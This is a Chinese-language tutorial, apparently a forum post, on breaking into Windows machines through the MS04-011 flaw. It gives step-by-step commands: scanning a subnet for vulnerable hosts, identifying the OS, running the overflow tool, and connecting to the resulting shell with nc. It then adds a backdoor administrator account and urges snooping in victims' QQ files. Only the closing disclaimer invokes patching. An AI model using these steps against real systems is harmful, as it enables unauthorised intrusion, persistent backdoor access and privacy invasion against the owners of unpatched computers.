Ms04011漏洞

呵呵，大家都應知道這個漏洞吧，哈哈，它好厲害哦。HACKER們利用它來可以得到操作系統的administrators權限，得到系統的shell。不多說別的，看看他們都是入何入侵別人的機器吧。

 

1．  首先，去下載ms04011漏洞溢出的工具，網上有好多哦。

工具中包括了DSScan， GetOS, MS04011溢出工具

DSScan:這個工具是用來掃描系統是否有MS04011漏洞的工具，當掃描到目標機器就此漏洞，便會列出它的ip地址，主機名， netbios名稱,  還有最重要的就是狀態信息. 它可以掃描到在此ip斷內所有存活的主機，如果有MS04011漏洞的機器，在狀態信息就列出vulnerable,否則爲not vulnerable。一般一次掃描64個ip地址。

GetOS:其是用來獲得操作系統的類型，但必須對方機的139端口開放.

MS04011:其就是用來溢出的工具了.

2.如何溢出

首先用DSScan，在IP斷內輸入IP, 然後點那個右鍵頭，使其進入右邊的框內，可以多選

然後點擊開始就可以.例如，我們掃到一個機器的結果爲這樣

Ip                      hostname           netbios              status

192.168.1.33       You                You                vulnerable

192.168.1.34       haha               haha                not vulnerable

大家可以看到192.168.1.33的機器status爲vulnerable,這就說明它存在這ms04011的漏洞。

下面就讓我們去溢出它吧，在開始溢出前先要得到對方機器的類型。用Getos來得到

在運行用輸入cmd,回車，然後到你的程序路徑下，輸入getos 192.168.1.33

結果就會出現

[*] Connecting Port 139…..

[*] Sending session request…..

[*] Sending negotiation request….

[*] Sending setup account request….

[*] Successful…….

Remote OS:

-------------

WORKGROUP   這是工作組名

Windows 2000 LAN Manger  

Windows 5.0     這就是操作系統的類型，如果爲windows 5.1那麼就是xp 了

好了，我們知道它的類型是2000了，那麼我們就馬上用 ms04011來溢出吧

先打開兩個cmd窗口, 在兩個裏面同時輸入ms04011 0 192.168.1.33 然後一個一個的回車

在一個cmd裏會出現

Shellcode size 404

Ret value = 1726  //注意1726纔是溢出成功的代碼

對於xp系統要用    Ms04011 1 192.168.1.33

3.如何得到機器的shell

要用到最厲害的瑞士軍刀了(名稱是NC), 哈哈，這個工具可不一般啊，到網上下載吧

然後在cmd內輸入nc 192.168.1.33 1234。 1234是溢出的端口號.哈哈是不是出現了這樣的提示

C:/winnt/system32>

//哈哈，你成功了。你可以對其操作了

 

比如：

Net user haha 123 /add        //在對方機器可以建立名爲haha, 密碼爲123 的用戶

Net localgroup administrators haha /add  //使haha列入administrators組.

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

 

當然可以到應用程序的tencent目錄裏看看MM的QQ號啊，以後常聯繫哦。

 

 

嚴重聲明：不可以利用此方法做非法行爲，如發現本人不負任何責任。發表此文的目的在於使大家重視自已係統的安全，常打補丁。在國內有好多的機器存在這樣的漏洞，唉！！！！！